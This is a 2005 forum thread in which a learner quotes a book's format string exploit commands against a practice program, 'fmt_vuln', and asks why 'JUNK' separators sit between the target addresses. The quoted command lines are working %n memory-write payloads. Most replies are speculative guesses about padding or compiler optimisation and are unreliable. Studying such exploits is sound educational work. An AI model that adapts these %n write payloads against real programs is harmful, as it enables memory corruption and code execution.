-
June 22nd, 2005, 08:48 PM
#1
Junior Member
format string : Question
I found a format string tutorial in a book. Have understood the basic concept, but have a question about one of the examples. The aim is to write the address 0xddccbbaa into a static int variable declared in a program fmt_vuln. The book says that first you write 0xaa like this:
./fmt_vuln `printf "\x70\x97\x04\x08"`%x.%x.%153x%n
which works. Then, it says that in order to write 0xbb we need to increment the byte count upto 187 which is 0xbb in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049770. The word "JUNK" is four bytes and is fine. Similarly for writing 0xcc and 0xdd
So according to the book, the entire write procedure would be:
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08JUNK\x72\x97\x04\x08JUNK\x73\x97\x04\x08"`%x.%x.%129x%n%17x%n%17x%n%17x%n
My question is: Why do we need the four bytes of JUNK separating the addresses even thought we can control the number of bytes by using the size of %x as in %129x??
Thanks
-
June 22nd, 2005, 09:51 PM
#2
Wild guess: Required memory space padding. This isn't an uncommon practice. If you ping certain OSes and look at a packet capture, you'll see they pad the packets with "junk" like 1234567890....
--Th13
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
June 23rd, 2005, 12:12 AM
#3
Now here's a first :
I haven't a clue as to how to respond ............... yet the answer from TH13 made perfect sense
is this a sign of advancement into geekhood ?
or is it just advancing old age
[edit]
the greens are from me for the confusion ........
so now I'm in my SIXTIES FFS
WTAF, how did that happen, so no more alterations to the sig, it will remain as is now
Beware of Geeks bearing GIF's
come and waste the day :P at The Taz Zone
-
June 23rd, 2005, 12:25 AM
#4
Junior Member
I thought about the padding, but the problem with that is that each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required??
This is confusing, Help!!
-
June 23rd, 2005, 01:14 AM
#5
This is a very interesting analysis of format string bugs. I've been looking over it most of the afternoon and decided to share. Even if you can't use it it's got a lot of good information.
Analysis of Format String Bugs (PDF)
-
June 23rd, 2005, 12:41 PM
#6
Junior Member
I am pretty sure that TheHorse is correct in his assumption that these are used for padding. You are attempting to write an address into some variable and it is necessary to make sure the bytes are properly aligned in memory. This is similar to how the return address in buffer overflows have to be properly aligned to fit into the correct memory location. If things are not properly aligned (padded), then the wrong address would get written.
An ancient chinese man once told me: \"The hotter the tea, the bigger the wang.\"
My tea is extra hot.
-
June 23rd, 2005, 03:31 PM
#7
Modern processors actually take longer to read just one byte instead of 4. IIRC it's because of the way the addressbus accesses memory. So it could be some compiler optimization. You store just one byte but the compiler modifies it to 4 (the actual byte and 3 bytes padded). That could improve the speed of the program (size-speed trade-off).
One way to find out though is to run your program (including the 'exploit') using a debugger. That will give you chance to look at what the stack actually looks like when it gets 'hit'.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
June 23rd, 2005, 03:38 PM
#8
SirDice is right, most processors read blocks of 4 bytes or more (normaly whatever the word size is although it varies slightly), so optimization is probably a good guess. Is it possible to contact the author for comment?
With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .: Bring OS X to x86!:.
Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.
-
June 23rd, 2005, 04:01 PM
#9
Junior Member
But the compiler doesn't see the format string. The format string is entered as a parameter to an already compiled (exploitable) program (usually taking advantage of printf(string) instead of printf(%s, string)). So the compiler itself does not ever see the format string because it is entered as a parameter. I am almost 100% sure that this is to ensure that the data being entered (the address to be stored) lines up correctly in memory (dealing with word size).
An ancient chinese man once told me: \"The hotter the tea, the bigger the wang.\"
My tea is extra hot.
-
June 23rd, 2005, 04:51 PM
#10
Junior Member
Padding seems most obvious but HOW does it need padding? As I wrote earlier each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required??
The processor does read 4 bytes (1 word) but that would mean that it reads all the four consecutive memory addresses. There is no need for the junk, which in any case would add to one byte in the address to make 5 bytes not 4.
Hopefully we can sort this out :/
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|